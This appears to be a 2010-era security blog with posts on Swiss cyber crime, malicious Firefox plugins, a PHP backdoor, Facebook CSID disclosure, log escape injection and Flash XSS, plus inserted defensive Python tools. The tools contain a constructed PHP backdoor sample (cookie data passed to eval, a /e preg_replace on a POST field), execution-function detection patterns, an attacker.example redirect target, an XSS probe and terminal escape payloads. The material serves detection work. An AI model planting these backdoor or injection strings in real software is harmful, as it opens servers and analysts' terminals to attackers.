
ISSS - Cyber Crime and Switzerland


As a candidate for the board of the Information Security Society Switzerland (ISSS), I organized the St. Gallen conference on 29 April 2010 together with Lukas Ruf. Its topic is "Cyber Crime and Switzerland", and I think a very appealing (free) programme has been put together.

17:30 - 17:40
Welcome
Dr. Lukas Ruf, Consecom AG

17:40 - 18:15
Cyber Crime and Switzerland
Marc Henauer, FEDPOL/KOBIK

18:15 - 18:50
European Cyber Crime Convention
Lic. iur. Fürsprech Beat Lehmann, lecturer in IT law, University of Zurich

18:50 - 19:00
Break

19:00 - 19:35
Cyber Underground
Ivan Bütler, Compass Security AG

19:35 - 20:10
Google's Anti-Phishing/Anti-Malware Efforts
Noé Lutz, SafeBrowsing Team, Google Inc., USA

20:10 - 20:15
Closing of the conference
Dr. Thomas Dübendorfer, President ISSS

20:15 - approx. 20:45
Apéro (reception)


I would be glad to welcome a few blog readers there.

Registration at: http://www.isss.ch/veranstaltungen/2010/st-galler-tagung/

Regards
Ivan Bütler
E1

Firefox surveillance plugin


The use of Firefox plugins as little helpers for daily surfing has become firmly established, at least for me. But how thoroughly do I check the quality of those plugins each time? Can plugins contain malware?

To explore this question, I made a short movie that shows how easily a plugin can be turned into an observation plugin.

My recommendation is therefore to visit websites that require increased confidentiality with reduced Firefox instances. This can be achieved with Firefox profiles, for example by creating a profile without any plugins and add-ons. To start the Firefox profile manager, enter the following command:

firefox -P

Otherwise the movie will help; it can be watched at http://www.hacking-lab.com/download.
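The following helper is an added example, not code from the original post. It builds the Firefox command lines that create and launch a separate, add-on-free profile, and audits a profile directory to confirm that it really carries no add-ons before you use it for sensitive sites. It assumes that `firefox -CreateProfile <name>` creates a profile and `firefox -P <name> -no-remote` starts a separate instance bound to it, and that user-installed add-ons live under `<profile>/extensions/` (one `<id>.xpi` file or `<id>` directory each) and are listed in `<profile>/extensions.json` with `"location": "app-profile"` on current Firefox versions; the post itself only mentions `firefox -P`.

```python
"""Added example, not code from the original post: build the command lines for
a clean, add-on-free Firefox profile and audit a profile directory for add-ons.

Assumptions (not stated in the post): `firefox -CreateProfile <name>` creates a
profile, `firefox -P <name> -no-remote` starts a separate instance bound to it,
user add-ons live under <profile>/extensions/ and are listed in
<profile>/extensions.json with "location": "app-profile".
"""
import json
import os
import tempfile


def create_profile_argv(name: str) -> list:
    """Command that creates a fresh, empty profile with the given name."""
    return ["firefox", "-CreateProfile", name]


def launch_profile_argv(name: str) -> list:
    """Command that starts a separate Firefox instance bound to that profile.
    -no-remote stops the request from being handed to an already running
    instance, which would open the page in the add-on-laden default profile."""
    return ["firefox", "-P", name, "-no-remote"]


def installed_addons(profile_dir: str) -> list:
    """Sorted add-on ids found in a profile directory (extensions/ + extensions.json)."""
    found = set()
    ext_dir = os.path.join(profile_dir, "extensions")
    if os.path.isdir(ext_dir):
        for entry in os.listdir(ext_dir):
            # "<id>.xpi" packed add-on or "<id>" unpacked directory
            found.add(entry[:-4] if entry.endswith(".xpi") else entry)
    ext_json = os.path.join(profile_dir, "extensions.json")
    if os.path.isfile(ext_json):
        with open(ext_json, encoding="utf-8") as fh:
            data = json.load(fh)
        for addon in data.get("addons", []):
            # built-in/system add-ons use other locations; only user installs count
            if addon.get("location") == "app-profile":
                found.add(addon["id"])
    return sorted(found)


def is_clean(profile_dir: str) -> bool:
    """True if the profile carries no user-installed add-ons."""
    return installed_addons(profile_dir) == []


def demo() -> dict:
    """Create two constructed profile directories in a temp folder and audit them."""
    base = tempfile.mkdtemp(prefix="ff-profile-demo-")
    clean = os.path.join(base, "banking")          # the reduced profile
    os.makedirs(os.path.join(clean, "extensions"))

    dirty = os.path.join(base, "default")          # the everyday profile
    os.makedirs(os.path.join(dirty, "extensions"))
    open(os.path.join(dirty, "extensions", "helper@example.com.xpi"), "w").close()
    with open(os.path.join(dirty, "extensions.json"), "w", encoding="utf-8") as fh:
        json.dump({"addons": [
            {"id": "helper@example.com", "location": "app-profile"},
            {"id": "observer@example.com", "location": "app-profile"},
            {"id": "formautofill@mozilla.org", "location": "app-builtin"},
        ]}, fh)

    return {
        "create": create_profile_argv("banking"),
        "launch": launch_profile_argv("banking"),
        "banking_addons": installed_addons(clean),
        "banking_clean": is_clean(clean),
        "default_addons": installed_addons(dirty),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run the audit against the real profile directory (shown in the profile manager or in about:profiles) before each sensitive session; an add-on that appears in the "clean" profile is exactly the kind of unreviewed code the post warns about.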

Regards
E1

Backdoor in PHP Software


Dear Blog Reader,

I love open source software and I could not live without Apache, Tomcat, MySQL and others. But what about the trust I have to place in these software components? Today, I got another sense of disappointment because a backdoor was found in a recent PHP application.


============ BACKDOOR class2.php, line: 1876 ============


============ BACKDOOR class2.php, line: 1876 ============

How do you evaluate the trust level of open source software?
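One part of an answer is to triage a release before deploying it. The scanner below is an added example, not code from the original post or from the affected PHP project: a heuristic that flags PHP lines where HTTP request data (cookies, headers, POST fields) reaches a code- or command-execution primitive, the shape most PHP backdoors take. It complements, and does not replace, reading the code and verifying the release hash or signature against the project's own announcement. The sample PHP below is constructed for the demo; the class2.php backdoor from the post is not reproduced here.

```python
"""Added example, not from the original post: heuristic backdoor triage for PHP
source. Flags lines where request-controlled data (directly or via a variable
assigned from it earlier) reaches eval()/system()-style sinks, where an
obfuscated payload is decoded straight into such a sink, and preg_replace()
calls with the /e modifier (which executes the replacement as PHP).
"""
import re

# Where attacker-controlled input enters a PHP script.
SOURCE_RE = re.compile(r"\$_(?:GET|POST|COOKIE|REQUEST|SERVER)\b|\bgetenv\s*\(|php://input")
# Functions that turn a string into code or a shell command.
SINK_RE = re.compile(
    r"\b(?:eval|assert|create_function|system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
# Decoders typically used to hide the payload from a plain grep.
DECODE_RE = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(")
# preg_replace("<delim>...<delim>e", ...): captures the modifier letters in group 3.
PREG_E_RE = re.compile(r"\bpreg_replace\s*\(\s*(['\"])(.)(?:.*?)\2([a-zA-Z]*)\1")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=[^=]")


def scan_php(source: str) -> list:
    """Return [{"line": n, "reason": text}, ...] for one PHP file.
    One pass, line based: a variable assigned from a request source on an
    earlier line counts as tainted on later lines."""
    findings = []
    tainted = set()
    for lineno, line in enumerate(source.splitlines(), start=1):
        code = line.strip()
        if code.startswith(("//", "#", "/*", "*")):
            continue  # comment-only line
        tainted_used = any(re.search(re.escape(v) + r"\b", code) for v in tainted)
        has_source = bool(SOURCE_RE.search(code)) or tainted_used
        has_sink = bool(SINK_RE.search(code))
        has_decode = bool(DECODE_RE.search(code))
        preg = PREG_E_RE.search(code)
        if preg and "e" in preg.group(3):
            findings.append({"line": lineno,
                             "reason": "preg_replace with /e modifier executes the replacement as PHP"})
        elif has_sink and has_source:
            findings.append({"line": lineno,
                             "reason": "request-controlled data reaches a code/command execution function"})
        elif has_sink and has_decode:
            findings.append({"line": lineno,
                             "reason": "decoded (obfuscated) payload passed to a code/command execution function"})
        assign = ASSIGN_RE.match(code)
        if assign and SOURCE_RE.search(code):
            tainted.add(assign.group(1))  # remember $var = $_COOKIE[...] etc.
    return findings


# Constructed sample: request data is escaped and only echoed, nothing to flag.
CLEAN_SAMPLE = """<?php
$name = htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8');
echo "Hello " . $name;
"""

# Constructed sample shaped like common PHP backdoors: a cookie value is
# base64-decoded into eval(), and a /e preg_replace executes a POST field.
BACKDOORED_SAMPLE = """<?php
// session helper (constructed sample)
$key = $_COOKIE['session_backup'];
if (isset($key)) {
    eval(base64_decode($key));
}
preg_replace("/.*/e", $_POST['cmd'], "");
"""


def demo() -> dict:
    return {"clean": scan_php(CLEAN_SAMPLE), "backdoored": scan_php(BACKDOORED_SAMPLE)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "no findings")
```

Expect false positives on legitimate admin tooling that really does run commands from request parameters; every hit is a line to read, not a verdict. A grep-style scan like this would have surfaced an eval-of-decoded-input line such as the one reported at class2.php line 1876 for manual review.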

Regards
Ivan

Reference: Bugtraq by Bogdan Calin - Mon 1/25/2010 11:59 AM

Facebook SSO Attack Pattern (CSID)



Facebook is becoming more and more a target for security researchers. Today I read the bugtraq posting by Quaji about the CSID (Cross Site Identification) attack, in which an attacker's page can obtain a victim's Facebook friend list if the user is logged in to Facebook while visiting the malicious page.

http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html

The issue is rather complex and long, so I will do my best to shorten the story for you.

Facebook has some kind of SSO (single sign-on) functionality. This is extremely useful when you are building your own Facebook applications on apps.facebook.com. The Facebook applications on apps.facebook.com inherit the user principal in certain situations, and this is the attack vector exploited in Quaji's advisory. For Facebook, this is a feature that enables single sign-on. For the researchers it is a vulnerability, because anyone can register and write applications on apps.facebook.com.

The Flash video presented by Quaji shows the user logged in to Facebook while also visiting a malicious page. When the page is loaded, an image tag requests an image; after several redirects, the final image is delivered by the malicious page, and the principal information, containing the user ID, friends and more, shows up in the attacker's web server log.

In other words, in some cases Facebook acts as a proxy and requests the resource on behalf of the user. These requests can contain the Facebook principal, not in all cases, but in certain ones.

What can we learn from this posting and video? The same we know from the e-banking situation. Don't visit your e-banking server concurrently while you are visiting other internet pages. Do your business in single browser instances and deny tabbed browsing for your own security.
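On the server side, the lesson is that a proxy which fetches resources on behalf of a logged-in user must decide, at every redirect hop, whether the user's identity may travel with the request. The check below is an added example, not Facebook's code and not code from Quaji's advisory: the trusted-host list, the URLs and the redirect chain are constructed for the demo, and the allow-list is an assumption, not Facebook's actual policy. It deliberately handles the host-confusion cases (`user@host`, backslashes, look-alike subdomains, plain http) that a naive string comparison gets wrong.

```python
"""Added example, not from the original post: decide whether a proxying front
end may forward the user's principal to a redirect target. Hosts and URLs are
constructed; TRUSTED_HOSTS is a demo assumption."""
from urllib.parse import urljoin, urlsplit

TRUSTED_HOSTS = ("facebook.com",)  # demo assumption: first party and its subdomains


def host_is_trusted(host: str, trusted=TRUSTED_HOSTS) -> bool:
    """Exact match or subdomain of a trusted host (case-insensitive, trailing dot ignored)."""
    host = host.lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in trusted)


def should_attach_principal(target: str, base: str = None, trusted=TRUSTED_HOSTS) -> bool:
    """True only if the resolved target is an https URL on a trusted host.
    `base` is the URL the redirect came from, used to resolve relative Location values."""
    url = urljoin(base, target) if base else target
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False  # never send identity over plain http
    if parts.username is not None or "\\" in parts.netloc:
        return False  # "trusted@attacker" userinfo tricks and backslash host confusion
    if not parts.hostname:
        return False
    return host_is_trusted(parts.hostname, trusted)


def follow_chain(start: str, locations, trusted=TRUSTED_HOSTS) -> list:
    """Walk a redirect chain (the Location values a proxy receives) and record,
    hop by hop, whether the principal may travel. Stops at the first hop where
    it may not: anything fetched beyond that point must be fetched anonymously."""
    current = start
    decisions = [(current, should_attach_principal(current, trusted=trusted))]
    for loc in locations:
        current = urljoin(current, loc)
        ok = should_attach_principal(current, trusted=trusted)
        decisions.append((current, ok))
        if not ok:
            break
    return decisions


def demo() -> list:
    # Constructed chain: two first-party hops, then a redirect to a third party.
    return follow_chain("https://apps.facebook.com/demoapp/avatar.png",
                        ["/redirect?to=img", "https://attacker.example/collect.gif"])


if __name__ == "__main__":
    for url, ok in demo():
        print("attach principal" if ok else "DROP principal", url)
```

The point of stopping the chain is that the redirect is the attacker's lever: the first two hops look harmless and only the last one leaves the first party, so a check applied once at the start of the request is not enough.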

Have a safe day

Ivan


Second Order Injection - Terminal Breakout


What is Second Order Injection? In some cases attackers are able to store their malicious code in a storage area of a web application, where it may be executed at a later time or date. Some smart "hackers" change the browser's "User-Agent" header into a cross-site scripting pattern, and when the log is analyzed later, a successful cross-site scripting exploitation could take place.

This is all known, but one could also insert special characters that have a special meaning in your shell (bash/csh/ksh/...) or terminal to exploit a "grep" or "tail" command once the log is analyzed manually in a terminal.

The authors call it "log escape sequence injection". A large list of web application servers are vulnerable (not Apache)!

Please review the alert message from the authors.
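The defensive counterpart is to never let raw log bytes reach the terminal. The script below is an added example, not from the original post or from the authors' alert: it classifies access-log lines as carrying terminal control sequences or HTML markup and rewrites control characters into a visible form before printing. The three log lines are constructed for the demo: a normal request, one whose User-Agent carries an XSS probe, and one whose User-Agent carries an ESC-based control sequence that a terminal would interpret when the raw log is grep'ed or tailed.

```python
"""Added example, not from the original post: detect and neutralise log lines
that would be interpreted by a terminal (or by a browser-based log viewer)
instead of being displayed. Sample lines are constructed."""
import re

SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jan/2010:10:00:00 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [25/Jan/2010:10:00:01 +0100] "GET /login HTTP/1.1" 200 2048 "-" "<script>alert(1)</script>"',
    '10.0.0.7 - - [25/Jan/2010:10:00:02 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 \x1b[2J\x1b[H\r"',
]

# C0 controls (ESC, CR, BEL, ...), DEL and C1 controls (e.g. the single-byte
# CSI 0x9b that appears when a latin-1 decoded log is shown in a UTF-8 terminal).
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f-\x9f]")
# The second-order XSS case from the post: markup stored via the User-Agent.
MARKUP_RE = re.compile(r"<\s*/?\s*(?:script|img|iframe|svg)\b|javascript:", re.IGNORECASE)


def has_terminal_controls(line: str) -> bool:
    return CONTROL_RE.search(line) is not None


def sanitize(line: str) -> str:
    """Replace every control character by its visible \\xNN form. The evidence is
    preserved for the analyst; only its effect on the terminal is removed."""
    return CONTROL_RE.sub(lambda m: "\\x%02x" % ord(m.group()), line)


def classify(line: str) -> set:
    """Set of tags describing why a line needs attention (empty if it is plain)."""
    tags = set()
    if has_terminal_controls(line):
        tags.add("terminal-escape")
    if MARKUP_RE.search(line):
        tags.add("html-markup")
    return tags


def suspicious_lines(lines) -> list:
    """1-based indexes of the lines that carry either kind of injected content."""
    return [i for i, line in enumerate(lines, start=1) if classify(line)]


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOG, start=1):
        print(i, sorted(classify(line)) or "ok", sanitize(line))
```

For ad-hoc work in a shell, `cat -v` and `less` already render control characters visibly (`^[` for ESC); piping `grep` or `tail -f` output through `cat -v` gives the same protection as `sanitize()` without any scripting.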

Have a safe day

Ivan

XSS vulnerabilities in 34 million Flash files


Recently, Compass Security found some cross-site scripting vulnerabilities in Camtasia-generated Flash applications. This vulnerability is the basis of a new Hacking Lab challenge, especially for the audience of the upcoming Swiss Cyber Storm III challenge.

Nevertheless, this morning I was made aware of another Flash vulnerability in tagcloud.swf, potentially present in more than 34 million Flash files worldwide. In the last couple of weeks Compass has been asked about the security implications of adding a Flash application to a secure web container such as e-banking, online trading or a secure portal area. Compass highly recommends analyzing your Flash files for cross-site scripting and similar issues, especially when they are generated by a tool rather than written by hand by your professionals.

Have a safe day
Ivan